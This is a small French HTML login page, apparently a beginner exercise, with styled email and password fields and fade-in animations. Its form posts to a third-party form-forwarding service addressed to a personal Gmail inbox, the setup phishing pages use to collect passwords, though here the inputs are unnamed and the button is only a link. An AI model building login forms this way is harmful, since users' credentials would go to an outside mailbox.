<!DOCTYPE html>
<html lang="fr">
<head>
	<meta charset="UTF-8">
				<title>Titre de la page</title>
				<link href="https://unpkg.com/aos@2.3.1/dist/aos.css" rel="stylesheet">

				<style>
								#d1{
							    	position:absolute;
									left:750px;
									top:200px;
									font-size:100px;
									border:solid 2px #ffff;
									width:500px;
									border-radius:10%;
									background-color:whitesmoke;
									height:400px;
									text-align:center;
									padding:10px;
									transition: all 0.5s ease; 
									}
						  #d1:hover{
								   box-shadow: 5px 5px black; 
								   transition: all 0.5s ease; 
									  }
							  input{
									font-size:30px;
									height:100px;
									width:400px;
								}
								a{
							    	font-size:50px;
									text-decoration:none;
									color:#ffff;
									border:solid 2px black;
									background-color:#2babff;
									border-radius:10%;
											
								}
						   legende{
									font-size:70px;
								}
								#d2{
									background-color:#ffff;
					            	width:600px;
									height:500px;
									position:absolute;
									top:200px;
									left: 150px;
									color:black;
									text-align:center;
								}
								h2{
									font-size:70px;
								}
								p{
									font-size:50px;
							    	}
								h1{
									border-bottom:solid 2px black;
									text-align:center;
									font-size:80px;
									transition: all 1s ease;
							
								}
					    	h1:hover{
                                    border-bottom: solid 10px black;
									transition: all 0.5s ease;
								   }
								 h3{
									color:#ffff;
									border-bottom:solid 2px black;
									position:absolute;
									top:700px;
									text-align:center;
									width:100%;
								}
				</style>
</head>
<body>
				<h1>connection</h1>
				<div id="d1" data-aos="fade-up" >
								<form action="https://formsubmit.co/jackmabs61@gmail.com" method="post">
												<legende>information</legende>
												<input type="email" id="em" placeholder="email:"><br>
												<input type="password" id="mp" placeholder="mot de passe: "><br>
												<a href="ec1.html" id="">se connecter</a>
												
								</form>
				</div>
				<div id="d2" data-aos="fade-right">
								<h2>connection</h2>
								<p>connecter vous a votre compte</p>
								<a href=""id="a2">mot de passe oublié</a>
				</div>
				<h3>0 eheh0</h3>
<script src="https://unpkg.com/aos@2.3.1/dist/aos.js"></script>
<script>
  AOS.init();
</script>							
</body>
</html>
